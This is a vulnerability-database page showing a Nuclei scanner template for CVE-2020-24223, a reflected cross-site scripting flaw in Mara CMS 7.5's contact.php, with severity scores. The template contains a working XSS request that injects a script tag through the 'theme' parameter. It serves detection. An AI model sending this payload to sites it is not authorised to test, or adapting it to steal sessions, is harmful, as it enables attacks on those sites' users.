Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-24223
HistorySep 01, 2020 - 6:16 p.m.

Mara CMS 7.5 - Cross-Site Scripting

2020-09-0118:16:14
ProjectDiscovery
github.com
6
mara cms
reflected cross-site scripting
vulnerability
contact.php

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.012

Percentile

85.6%

Mara CMS 7.5 allows reflected cross-site scripting in contact.php via the theme or pagetheme parameters.

id: CVE-2020-24223

info:
  name: Mara CMS  7.5 - Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: Mara CMS 7.5 allows reflected cross-site scripting in contact.php via the theme or pagetheme parameters.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to the latest version of Mara CMS or apply the vendor-provided patch to fix the XSS vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/48777
    - https://sourceforge.net/projects/maracms/
    - https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download
    - https://nvd.nist.gov/vuln/detail/CVE-2020-24223
    - https://github.com/Elsfa7-110/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2020-24223
    cwe-id: CWE-79
    epss-score: 0.0069
    epss-percentile: 0.79693
    cpe: cpe:2.3:a:mara_cms_project:mara_cms:7.5:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: mara_cms_project
    product: mara_cms
  tags: cve2020,cve,mara,xss,edb,mara_cms_project

http:
  - method: GET
    path:
      - '{{BaseURL}}/contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c184f6cf7e4218d7dc019d2c5ea69521956dec299e26d63e7d225fdfa6ff333202206a684eb7713168bde079f4ecbe55ba8abfc7056a40ec4a4306788f69e880bb70:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.012

Percentile

85.6%

Related for NUCLEI:CVE-2020-24223